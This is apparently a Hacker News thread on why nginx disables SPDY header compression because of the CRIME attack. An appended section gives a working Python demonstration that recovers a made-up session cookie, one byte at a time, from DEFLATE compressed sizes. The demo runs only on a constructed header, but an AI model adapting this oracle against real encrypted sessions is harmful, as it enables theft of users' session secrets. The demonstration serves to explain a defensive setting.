Hacker News
by BobVerg 4522 days ago
"spdy_headers_comp 7;" looks like huge overkill. It provides about a 10% better compression ratio than setting 1, but is two times slower.

I was wondering why it is 0/off by default. Are there issues with client/browser compatibility?
It's because of the CRIME vulnerability.
More information about CRIME: http://en.wikipedia.org/wiki/CRIME_(security_exploit) For now, disabling SPDY header compression is the right approach. Security > Performance.
Let's be clear that the original CRIME attack was against request header secrets. Therefore, disabling response header compression (as nginx defaults to) does not prevent that. SPDY/3.1 request header compression is a client-side choice, not server-side.
The CRIME attack isn't specific to request or response headers. If you pass secrets in response headers, then the attack can be performed against them.
That's true, which is why I was careful to say "in its original form" :), since the original attack was on cookies (request headers). To my knowledge, no other SPDY server defaults response header compression to off. But yeah, if your application does pass secrets in response headers, you should be careful.
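The point made in the thread (CRIME, and why nginx ships with spdy_headers_comp 0) is easier to see in code. The following is an added example, not code from the thread or from nginx: a constructed header block in which attacker-controlled bytes (the request path) are DEFLATE-compressed in the same context as a Cookie header, and a guessing loop that recovers the cookie value byte by byte from nothing but the compressed size. The header layout, the secret "sessionid=7f3a9c2e", the Host value and the cookie name are all made up for the demo. Two choices are mine and not part of the real attack: fixed Huffman tables (zlib's Z_FIXED) so the result is deterministic, and a sum over eight padding lengths that turns byte-granular sizes into a bit-accurate oracle; a real attacker instead averages many requests. Because the oracle only cares that a secret and attacker-chosen text share a compression context, the same loop applies to a secret carried in a response header, which is the point raised above about response-header compression.

```python
import zlib

# Constructed secret for the demo: a session cookie the attacker wants to read.
SECRET = "sessionid=7f3a9c2e"

# Fixed Huffman tables (zlib.h value 4). Chosen so the demo is deterministic;
# dynamic tables add per-guess noise that real attacks average out over many
# requests. Older Pythons may not export the name, so fall back to the value.
Z_FIXED = getattr(zlib, "Z_FIXED", 4)


def header_block(injected: bytes, secret: str = SECRET) -> bytes:
    """Constructed stand-in for a SPDY header block (not SPDY's real framing):
    attacker-controlled bytes (the request path) share one compression
    context with the Cookie header, which is the situation CRIME exploits."""
    return (
        b"GET /" + injected + b" HTTP/1.1\r\n"
        b"Host: example.test\r\n"
        b"Cookie: " + secret.encode() + b"\r\n"
    )


def compressed_size(block: bytes) -> int:
    """Size on the wire: the only thing the attacker is assumed to observe."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15, 8, Z_FIXED)  # raw DEFLATE
    return len(c.compress(block) + c.flush())


def score(known: str, guess: str, secret: str = SECRET) -> int:
    """Sum of compressed sizes over 8 padding lengths.

    Each pad byte is a distinct value >= 0x90, which the fixed DEFLATE table
    (RFC 1951) codes as a 9-bit literal, so successive paddings walk the
    stream through every bit alignment. The sum then grows by exactly one
    for every extra bit in the unpadded stream, i.e. byte-granular sizes
    become a bit-accurate oracle. Lower score = better compression."""
    total = 0
    for p in range(8):
        pad = bytes(range(0x90, 0x90 + p))  # p distinct bytes, never matched
        block = header_block((known + guess).encode() + pad, secret)
        total += compressed_size(block)
    return total


def recover(prefix: str, alphabet: str, n: int, secret: str = SECRET) -> str:
    """Recover n characters following `prefix`, one at a time.

    The guess that extends the LZ77 back-reference between the injected
    path and the secret saves one literal in the output, so it has the
    lowest score; a wrong guess leaves the match length unchanged."""
    known = prefix
    for _ in range(n):
        known += min(alphabet, key=lambda ch: score(known, ch, secret))
    return known


if __name__ == "__main__":
    # The attacker knows the cookie name (the prefix) and the value alphabet.
    print(recover("sessionid=", "0123456789abcdef", 8))
```

Each step compares the compressed size of "sessionid=" plus one candidate character against the rest of the alphabet; the correct character lengthens the back-reference against the cookie by one and so compresses better. Turning spdy_headers_comp back on puts exactly this oracle in front of every header that shares the context, which is why the thread's "Security > Performance" conclusion holds unless no secret ever shares a compression context with attacker-influenced data.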